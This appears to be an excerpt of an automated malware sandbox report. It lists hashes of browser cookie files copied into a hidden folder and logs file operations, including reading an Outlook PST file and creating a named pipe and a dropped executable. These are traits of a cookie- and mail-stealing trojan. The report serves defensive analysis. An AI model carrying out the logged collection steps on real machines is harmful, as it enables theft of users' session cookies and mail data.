C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4MN240WN.txt 0.16 KB MD5: 3542c27584ae79503ebc82a304201a01
SHA1: 4e049f8599200e0c7f12f086957645a682d6dc84
SHA256: 54d355a67a4220c2d2171c27b17768c67f7b69336204bf5caa78d2a19d0fe5ee
SSDeep: 3:pNN1gyTuv7YcyfRvUVYrSRJ8vXH/UOvjSXVYyTuv7YceQ5vUVYrlSXcX/vXn:payTgKrSRJ+XvvuXVYyT5VKrl9nXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\U8FCPAKJ.txt 0.11 KB MD5: aa4cb4acfc891c1d86bd79af06632a27
SHA1: c81ca1f450d50b906e0a2489a85ac737f22da2c6
SHA256: d4d5795e4f6954a94bbc0a2032e0d2f674ca5697ce83711b86060c3dd9e1ee88
SSDeep: 3:JhWDhWdVmuPO3LyT0Xv7YcAMvWEHXhZ6Z0vXn:JJdVkLrOEHykXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MMPF10F4.txt 0.25 KB MD5: a1640d6fc4841bce5a607576e359ee86
SHA1: a290ba0b1ddb7c70002be319033caeab3ee47e53
SHA256: 03eab9ebdf12271a78951c77be387b6b522fbed8af8d084a05e33222d47a24ee
SSDeep: 6:cR6vD1XDRA6Jz48bgaXWAaoWy/V8IYUKhvnXn:lXDWwfXWtpyd8IghvXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\A0RK8A2H.txt 0.12 KB MD5: a588597215b073e4419ba2dd98a41412
SHA1: 0758752783cb22108e88d40c4f3cd2313edccb32
SHA256: 38073e4d52dc6b4b6adfda77bd16731a9790e0638dc106e3b2229c933b3859bc
SSDeep: 3:IWAThQgW+FSiRYWyb26BBgKEg40E07YchbRdZ78XCWdQI0vXn:IWAugWviubiqBgfp0EG3x/Xn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\P778SMC9.txt 0.08 KB MD5: a79195c5c524375b067abba0d0533deb
SHA1: 9d3ba9ac8a17afb371739f76bac374566581b1a7
SHA256: e13809fe52d1a486c350d8528a53b10adeb46b56cf208ee18c59268391a6dd5d
SSDeep: 3:oWVrYyqyyXPv7Yc1n5vUVYrgtnoQ0vXn:oWVrszrn2KrC+Xn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4O6583I0.txt 0.55 KB MD5: cbe2e6163070d0dd3727ba3ae1b54c3d
SHA1: cf0e8a0eaeb26002a620e73b291ba47d163e529a
SHA256: 9a910cc79a7ff4f95f5d917ab7aee3a266e94eb80af1beacff423bd7d8ff1093
SSDeep: 12:9PTDjN1clAB51lHPz9dN+zECykX6cFQUhzECirwX6cLZ7Br+zECBynX6cOzEC6Xn:9rDjN1Z5tOxX6YQqPX62rmPynX63YXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\TEW946CI.txt 0.14 KB MD5: 905660c54f67bfc4ff4f105bf912fa6a
SHA1: e1197b654214ca9acded872fd87bbfb5fbc2e1c5
SHA256: ddd120efff365d5b38c67edf515d36217fa9ebb9469b675b03e9947128d31d4b
SSDeep: 3:U8ULA+tRMVXJULvUVYr2mQtWVavXk/tuvFQ+tRMVXJWuQa6ZlSvXTQtWVavXn:AA+DMVXNKr2maW6Xk/tuv6+DMVXHQaY9 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\WX75TEOR.txt 0.28 KB MD5: 326b7abab45ab5d7a295ac7f7906d2de
SHA1: ec26372aa173331cf4b6806e6cd806b3a58ada86
SHA256: 3cbeabe1b3581ca4206845cb528045d9fdc38df6a1e2dbd800bb78e656de696f
SSDeep: 6:Wk8+dKXcj9UDvnXWAl8UmXcj9UDvnXTkW2xcj9UDvnXn:WkDdKXcj2DvXWcmXcj2DvXqcj2DvXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\2HYILE1O.txt 0.74 KB MD5: 05aac76b6e5e572582e6bd568789d6f3
SHA1: 13dd429f97cc2e6441a60d7a2301cac348c73957
SHA256: 3aceb7fcdafc2fbca160384722ceb4b09d5daf98f910fbdb7a0ca3a371549527
SSDeep: 12:IEj/XomgZcnX8mgZuTcXGKxiE4gZuTcXeIumgZO6XWZKBnmRWu/DJuVIS6XWhsBz:UZ6X8PZuTcXdxiEVZuTcXeFZvXrBm3jd 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9Z1Y5ICI.txt 0.11 KB MD5: 9825210d2d9321a0e9a8ea9f10d87245
SHA1: 0b910792e75c625be2ff256eded3251c5e615a2d
SHA256: 077410e4a46c2597c8a4e855016af21f1a6f9940649d7fe4374fbc829ae52c1e
SSDeep: 3:3ykZhTy/F1CRI0XviOG2yRLSrjyyS9VTVRCvXn:isWF1CRIFOG2CmrjuTwXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\16Y0X4V7.txt 0.40 KB MD5: 83644b16875ad59b518a166d5bed5b59
SHA1: 176405896e3158bd9bd3de552966bdb43384a65a
SHA256: e103787ab2e8ed7de8d2224acb22bfbc4681994db83382b73e2b22d690324359
SSDeep: 12:GOCl3ZK8X176GiIEZsBXONo5H3ZJe9qkX/i73ZsQXn:MlE8X1RiAXKsXuX/i7LXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\4Z6UDYLY.txt 0.09 KB MD5: 9a525b9701df706423183c5f00d4f28f
SHA1: fd1d0e39dd90826b4b4743b1b732c8889838c1ce
SHA256: 5fb85f1094ba640e67056c0da963f1c9f74ca7e3de59e30fc097a27fa9afa4df
SSDeep: 3:ZRRGlQGLLzPv6NmXTV4vUVYrgaqr7CvXn:EQcKMXTVVKr8rwXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RTEPN67M.txt 0.23 KB MD5: 6d142a6f5e44fc7ce7863836f46cdb59
SHA1: f3051c35b234cf3b8ddce4d148de524c6a4edf25
SHA256: 683de10c0ed7a13c4435580b662312be1cd34987de0408c3aaa6143aa4fdd317
SSDeep: 6:qWbEBnQjRWXEVWSlL4fYQnvvX9YIVvzlJHkXn:qWbonQgX8bqAQXXiINZaXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CC7DS78R.txt 0.08 KB MD5: 7d9c78cacb5a9cb94eb5aa8a2c742041
SHA1: ede585bae4c1e97119da972a37087b36838f6b02
SHA256: 9b3205b34c79623b10c63068cf77aea314094fede20a4d791e1b0ed61f040c52
SSDeep: 3:Kfx9L14XL00Xv7YceQ5vUVYrlTsLZ0vXn:cxv405VKrlTCkXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RAYRHE6Z.txt 0.49 KB MD5: ab8d9047a136b8ef0e61b12bd7009d6d
SHA1: d55a384d22818d914ef80ddf500dbedcfbc359db
SHA256: 672462423886461f5a46f3774d3c2a948d6d10dac3f7d1d58f6adfdff654edca
SSDeep: 12:I50mX3oZCWXFdaR0a4H1XJP2l5Isfd3G2Q76zqfZkXn:w0PCWX+Rt4H1XI5PN5E6WfWXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\ITD4OUAR.txt 0.18 KB MD5: 77e6230430d7e414dd05526fdcb160a0
SHA1: d16d3249558d650a76e374ff72b38c9ca5ea7420
SHA256: 208c87affcf51a0cc1fbd81e753a9f9af748456008bd84d815fe074a75b09135
SSDeep: 3:UhZKIdQhREcQQHqcAWGl2uv7YejeQVZST/YSeWVavX62Szs8Gl2uv7YcTRBdZ78u:dqQHEcQAqcAWGl2keAI8SeWVkX62S7Gb 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\J4JSQG9R.txt 0.70 KB MD5: ec0e2a4bb106d6fefc2a641a611b17e7
SHA1: bb2a769409d68e5e217acc5b010a53186354819c
SHA256: 9156016b2fafec5d8f2613e93aae9168651696bd24170bfcf3c9375045bcca67
SSDeep: 12:BcTUEk098kjXmv098DwkXmN098D/XmrPq/009pIwXmtCAb/XmcKSJstVYZnokNW7:BSdkDCXaLD1X2LD/Xz/0OfXkf/X4Sm/N 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\SEVCUJM3.txt 0.09 KB MD5: e12ee25dc159278b387468be4240ea17
SHA1: bd8053caa423bf3812c6c77b03f8e939fdc6dfcd
SHA256: 42446a69188bd5c18ebeb93bb0ac7d32267ccbef5fdfa66c38286019af826a46
SSDeep: 3:tM71+lRI0XviOSiRLSrwjvXn:ti4lRIFOSymr4Xn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\STGOZ493.txt 0.10 KB MD5: 88aa642b64e60a35a0eb0fc41ff77484
SHA1: 318c7687fdd0a21c8d661c356ce04e118b2f8604
SHA256: 8a8c19eb6ba82a9dc432164aaded48f31f52e821b6b171c41811fcd6dc0065c6
SSDeep: 3:8Zh7CsRe2ldf2o7Ld3vXv7YcMVoXPKQR56WVavXn:6wePRiYzR56W6Xn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1LLUY7B7.txt 0.12 KB MD5: 28aed6b5d232c8d69bdd5c2d0fb72fe0
SHA1: c8986a9f12be24704fea6c072600af8d5ef2a3ed
SHA256: 1883294be4a02f252d15f1603f35ae515f0f6acf100e456b20404bd01df2932d
SSDeep: 3:4i30B8S01RLZGSOS0dEGRuGvXviOBLST/ievXn:4iE+/LZL/kEGuxO8lXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\VD3GM2DA.txt 0.17 KB MD5: 9dee7b57dcabaa678e34aa6a14c881e0
SHA1: 5e98c1e1bc764d66e61599b2547fd7dc18885f0f
SHA256: 32a428fd82ed595868c88557aede73237053a4af89fee0da76b1cd56d5f7f123
SSDeep: 3:MvKGX3WIdzmmgNAZAWAIfFmNuyMLGTuv7YcPXPIdP7CvXn:AnWgy3NAZAHIfgN0yigdIXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\UGL14QS0.txt 0.13 KB MD5: f748c4a8663741332d2d3f371696e50b
SHA1: 39e9629d86ed99fc4ccb6f0bfa76843dc813d50b
SHA256: 9390fa24b3f6a4789dfa7a8645f4b3f79654cb1db3347963ae91c689f74e07f0
SSDeep: 3:U8LfyKfUVXJc/n5vUVYrxReTvECvXk/tuvF2yKfUVXJWvXcN6ZlSvXXeTvECvXn:FfZ8VXpKrXMvXk/tuvQZ8VXcXcNYIvHk 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9M7ZHW1Q.txt 0.49 KB MD5: c5b160a6bdddeae0b05016d73c9d3e15
SHA1: 48ef4584afc0a4f99690fad0622fc7b5b1ac360d
SHA256: 6485f3db1ac00f87b4cb91f1caeb1e1a70af5c224e012598470fe847b2ce9e4e
SSDeep: 12:fKQ5lxWmBEL0NKtoZXWDoYXqNKtoknXktelMwt0ny4NKtoknXn:fKcloWut8XYztbnXktMv19tbnXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\NYCCG1AV.txt 1.56 KB MD5: 701e185a66b6205df319a7031083916c
SHA1: d5b5e9779d95238a140de5ea88039113fd3be9f7
SHA256: 7530a36faa9961a59ef9c22fac64baea4b94947af1eaffec0e5958141fb65874
SSDeep: 24:diB7XDA7X+cNh7XUIGu+ckRR2Jqqnc8iWi24Ew9jflFxfxaS1gjQGQi6VjRVXn:d6XsX9HXUIGUGZjWitEGj93fxWjteHXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MCAKE788.txt 0.10 KB MD5: bcb18b0e67cb42cdc710ec9374de78e1
SHA1: 5c20b0edfa4ca01023c5f13ae937e3bce3f6451d
SHA256: 9a39cc3f626e7c2e1ac7272992fd3ec758a7fb935ec14fce90fa463cc25301c4
SSDeep: 3:KAXIzEnVXqP8DoRxLBI+Yc4XPlNVC+gevXn:KHCVi8DMNBUdHdXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CDGOWO27.txt 0.14 KB MD5: 7ef6c6ce7f843ad5e5dbe4c23476d57b
SHA1: 9a4ab75b9ba10681a6790f54a3ba1d59277ffada
SHA256: e0fd90163beef3e778f1e0f7ec42839655979fd20a97252a11e7b62e70ff9652
SSDeep: 3:nviXxWhTT52V/nm0dFmx2V/nmNMKsQ94RyK/v7Yc9dbbZ78X/fQTV0vXn:FhTIm0dFmUmNMTQqRZ1bRgfGVWXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\3VVSZ2CO.txt 0.13 KB MD5: 7f7b455594ec6c1845467547b86196cd
SHA1: d36163af4aa6a94ecb949795941fce93f9185c2a
SHA256: 7e06985f409edbaf7c50b665707659371e068f82308e81370611172081d385f5
SSDeep: 3:NAvhl79wPFdZAZXkFPaUMnKfUVXJRzAXJST/edvVjYRCvXn:NAZd6PZyUBunK8VXfzlIvXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\XUAUK5R0.txt 0.09 KB MD5: cf94bc0a85e8ec31b31ba1f6df852a3a
SHA1: c4e638ac6d92b4862b30e5382b4ae7aa2332e269
SHA256: 8498eb9eb0e1807995581cdb236fe898ea81d1b64ff97d7705c2a0c5c481654e
SSDeep: 3:33oVIT0xLJCuGGvXv7Yc8MeFXPNXcSo0vXn:B0xLMuzetlXctWXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\WUT8M1Q8.txt 0.35 KB MD5: 141ea27d246089f61d2c626824c89ab2
SHA1: 2cdd702daf06e67c4af5035566783cbf162d0004
SHA256: c46c320d59ddebfddd5470a36cb3c020cba0e254c7e793a2d2e7221022367877
SSDeep: 6:AVRkBSC26xSRW10XIBJvANSBWWjN26xSRW10XqJZZVMNVBPtSRW1TXWYSCSSZbWX:A7kBSCIX8aNSBnxIXqJZZCV9XWYSCSRX 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\NOCAHPZ6.txt 0.13 KB MD5: 0275efa4f33da5f0978e5570fbe1a384
SHA1: 018422667b4795a10b5ea7589d8427aecb96ef73
SHA256: 00513cd9b54981cbec62f815a17b94a0cee0d9e3c80a600b29aa8afb1ac71806
SSDeep: 3:FCXNUM2HAnxQXsA8RRJDgRsTTH3KyJXv6NmTIMeFXPNQaTgQ0vXn:FUP2HAWR8DJsRkT3nZSMT7etlQFQWXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CYHYO8JD.txt 0.11 KB MD5: 6b5ebf13aea6c467dd22dc47141419b8
SHA1: e3906219113c9f7dff3c25f1a87372536bf106a5
SHA256: 66e28e5d2177e9b6ea27ab60c5d2bfab2fc144b1a19f7e735e8f21decc79476d
SSDeep: 3:CQ7TAAJOVjuvbMyKfXv7YegtXJST/2LL0vXn:ZfAfSjdCaLLWXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\B67M68H4.txt 0.10 KB MD5: 4318c9793f2b6a347dec8834d135ca6c
SHA1: 191409ec70269a97d74553605fe4f188d4ce79a0
SHA256: b42fe0fb5430206830f63a114e6a8e975e310c5c73b40c3c1467000893c43ff7
SSDeep: 3:mCVNUvRRRB2WaYePkdUOORUJ3WM7VSv:mCgvjxykjVD7cv 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\UUEVXDWP.txt 0.54 KB MD5: 5c8ae4959a0d7602619a3c66988154b6
SHA1: 220cff54515520d13f6822205893651f2c548d2a
SHA256: 02214826575ef29b128c1a57e4e90516d113a6f333a7554ebe6cf8e47cd97493
SSDeep: 12:FYTNwX2XxEbXyf9t2X2X9bXyfFtHXYNsnbXyflMW6X8tuvNvvImX2X6QbXyf9t2X:FYhwXY2bXw9t2XY9bXwFtHXZnbXwlKXw 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\T1LCPPSA.txt 0.08 KB MD5: b2899520b074966f8c8702ae7c4d5a50
SHA1: 0aac474abe1290e92a6f7542a088a921abce85a8
SHA256: 54c32dc0359a44f3120ab4de1785006aefa4c41770237de106ceb67c76bdb6ba
SSDeep: 3:zws66RjcBvX0bfUVXJXnRXbZ78WUX7v/vXn:zw/QK7VXZbHUrvnXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MOE7DCQU.txt 0.12 KB MD5: 1fd4e359831f8693be70203e8961781e
SHA1: 84bbd3624f6f0574361b21cc7af2a1a735bc81de
SHA256: 76850c1318b057dacf5670a830f1ddc150c3c4080122ec034f23ee1c58f561e1
SSDeep: 3:SNoHNxnFEBVUEXGEqQgBLQ/v7YcOcpXQNqTJr7CvXn:/HNxnoXGzQZMcpltrwXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\WPEXKTDV.txt 0.37 KB MD5: 929a203e2d9f0e28ea39b88f5cb2bba7
SHA1: 5f9296dc59e420d0e5e16cbac196f57959cf1b74
SHA256: e64462d7465fc07c5bf16ada6b394cee95b9526516338e4342c32b773afa21a7
SSDeep: 6:MFOKZSgnlhWgW5GLsCkyRiENBH0fQ5kQbJRtAt/HP8y1AUaUKm5wXn:0lraFlyRiENBUoFbJIBv8ySm6Xn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\JQOCYKOH.txt 0.99 KB MD5: 72ea382b36198a27148aab5f1d348dcf
SHA1: a54832a578317e2d3faee12ca664fd9e8ea355ed
SHA256: 0e3df950902b1ab87598b3ce3d757c02cc2b0a315185c3349afc7553bf917cb8
SSDeep: 24:YTfyr8b1S4XaWX6j05X6tX0/eX6OkMX0bX637Xxb3Q1XRd50KHVKkXRWHVKkX6Oz:Qr1/XzX6jIX6tX/X6OrX+X637X5g1XRC 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MM8KB9U2.txt 0.42 KB MD5: 5cc2e105ff2d69d964117649bd67160d
SHA1: b087f166166accb1cbbb309c1050d3a7aa8467c8
SHA256: 1cad1bbc79f2dc24c368b0bc1080a4253f11682b458d6b103d060e16966db4ba
SSDeep: 12:9/NQAHX+JQo3Tu9UI30fOO7iIlEd3lmotBN+sADvG4QO8XEp0O3Tu8kXn:9/NQAHdo3T6r2C1vBN+sSv1QO8XrO3Tc 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\D9QO3KHK.txt 0.26 KB MD5: dd992b32063ca9d838df6c853fc671db
SHA1: 421ee2107e0372866ef3c3970ced55a546bf6101
SHA256: 437027be071e1dc7e108adf484bee7e1df18497ba2cb1d3844588761093c0b75
SSDeep: 6:LnLF/XCoVTyeAIrMz/XIJ/FloVTX9BEbZXn:Lp/bV9AIAz/X0/4V79AXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\E978TFRK.txt 0.15 KB MD5: 6be44de3554a12014e26570be04bdf1a
SHA1: 44fabc96184d0d045b87d05d50efe49b21b626dc
SHA256: 5f704f35e7f3fd56e614b8d32993735b5108eea115810deaa3592ce837c1648d
SSDeep: 3:y8v0GGLd/v7YcJsFXPq4cavXLTMb8TEd/v7YcYTlRZ78X3JcavXn:30RLdPstGkXkOEdSThoukXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RYK7X1K4.txt 0.11 KB MD5: 940ca1bd61c2553cd9f95a93edc5997e
SHA1: 739c28b26f326039315b87eb7d0932bd85d59d88
SHA256: bd86c349ecf385b282c4b93d35ecef3e06e1c0ecc6ba9d51221942d4c108ccc9
SSDeep: 3:1GfFlDZkSDsdmAzu5XuTYelbST/6rUdTOLRCvXn:1GbZOiQGnROLWXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AFMRGRY.txt 0.20 KB MD5: e763ee15bebb2fc6de2a805d11c0ad7f
SHA1: 8d98b94aeb2f51e4410aebc229b7329d207a20cc
SHA256: 452f9dba8ffafb071850743f0b0b9f708c7799ab8f9b8f89df55adca18d86f46
SSDeep: 3:oiRSHddSVIq9DeFWVNDh0Xv7YZVH2ST/J+RaR47CvXWW5+djSoIDh0Xv7YZVH2S+:DS9dYIogSpdFTf4wXWW5ijSdFTR7gXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\TFCJHLEI.txt 0.21 KB MD5: cf2137c36db861ac3451b0e44da7d996
SHA1: c56e668e1a8c9d2cc41344c2d848f881b6f04732
SHA256: 4dbd03091b1d18a4f91015af52467c40904ffe5da0d53302ff8b831786c5aef6
SSDeep: 3:8MrvwWWQDjSxQ7XFIyTKPv7Ycyl1XPJL9vWLRCvXRFA6riZ6cvUA/0dSIyTKPv7I:jqWjS2ph5ld7W6XuELA/kSh5ldZc5wXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\2XBM2EDN.txt 0.20 KB MD5: 8b51a9ad393e18f9c0bce2e94aafa770
SHA1: 9027543e02b28a0fffaba18cb64848f69fa0622d
SHA256: df7ff86575bd65cd23454aa9eaab24755016d5d30c7141ae12b8da3634a6f3d1
SSDeep: 6:s8nqs2S8jaKTyn/LVUSO96N/DArqp38rkUOTWHbpcv:s8z2S8BynzV26N7+qNdRTW74 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1LFQZEOH.txt 0.11 KB MD5: 695b6df8ace37000ebcdd4a5ccc58f60
SHA1: c05ce4eac17bf4fe26ed646fcdb44a6fc0572b7b
SHA256: 673dc8663a4527c3941c4b83ab3902ca79cb9a606635c82fbfed5eaa54ae04e3
SSDeep: 3:CqEXjFDJT6pch/0E4XvilbGTKPv7YeGSUts9P8dTUCvXn:iXjFdTh/OXvzKaE8RXXn 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\XNW1G0SM.txt 0.11 KB MD5: 0584bb7512a9cfa5ceae7af231835286
SHA1: d2503f883f6ff49ccabb5100ea965c79a5dd48ff
SHA256: f1fa017a59ba4d40e1f63c55343cadf1ea6414c932aabe1c4a86adc5813038f6
SSDeep: 3:KOXPGo3jX6uYOH3XiO4I8VXJRQVvWx5XZ6QcRUVBvn:vXPG2jnlniFPVXfoaXZ6QcRULn 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcache\counters.dat 0.12 KB MD5: 0fc07622856a4f02ec32f3b8cdc7d79a
SHA1: 69227fbe52d3fbfa3af508fee363698fd2a3613c
SHA256: 0ac6eba5d515f5a55c7d5bd712cb191aac9bbef780cac77f3a69e357d8c3d746
SSDeep: 3:/lV/l3l:d 		False
...
Host Behavior
COM (1)
»
Operation Class Interface Additional Information Success Count Logfile
Create 3C374A40-BAE4-11CF-BF7D-00AA006946EE AFA0DC11-C313-11D0-831A-00C04FD5AE38 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (880)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create \\.\pipe\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299} desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OVERLAPPED True 1
Fn
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4} desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{25E2F79F-402D-9FBF-7229-7443C66DE827}\01D4756785E0F97F09 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E} - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff\ - False 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff\\8i341t8m.default - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com - True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support - True 1
Fn
